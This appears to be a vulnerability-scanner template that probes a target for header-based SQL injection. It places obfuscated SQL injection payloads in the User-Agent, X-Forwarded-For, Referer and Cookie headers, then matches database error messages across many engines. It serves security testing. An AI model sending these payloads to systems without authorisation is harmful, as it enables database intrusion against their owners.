id: header-sqli

info:
  name: Request header based sqli
  author: panch0r3d (Thanks https://github.com/MR-pentestGuy for all of the Regexes)
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/"
    redirects: true
    max-redirects: 5
    headers:
      User-Agent: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      X-Forwarded-For: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      Referer: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
      Cookie: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)"
          - "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)"
          - "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)"
          - "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)"
          - "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)"
          - "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)"
          - "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)"
          - "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)"
          - "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)"
          - "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)"
          - "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)"
          - "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)"
          - "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)"
          - "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)"
          - "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)"
          - "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)"
          - "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)"
          - "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)"
          - "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)"
          - "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)"
        part: body
    extractors:
      - type: regex
        part: body
        regex:
          - "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)"
          - "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)"
          - "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)"
          - "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)"
          - "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)"
          - "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)"
          - "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)"
          - "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)"
          - "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)"
          - "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)"
          - "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)"
          - "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)"
          - "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)"
          - "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)"
          - "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)"
          - "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)"
          - "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)"
          - "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)"
          - "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)"
          - "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)"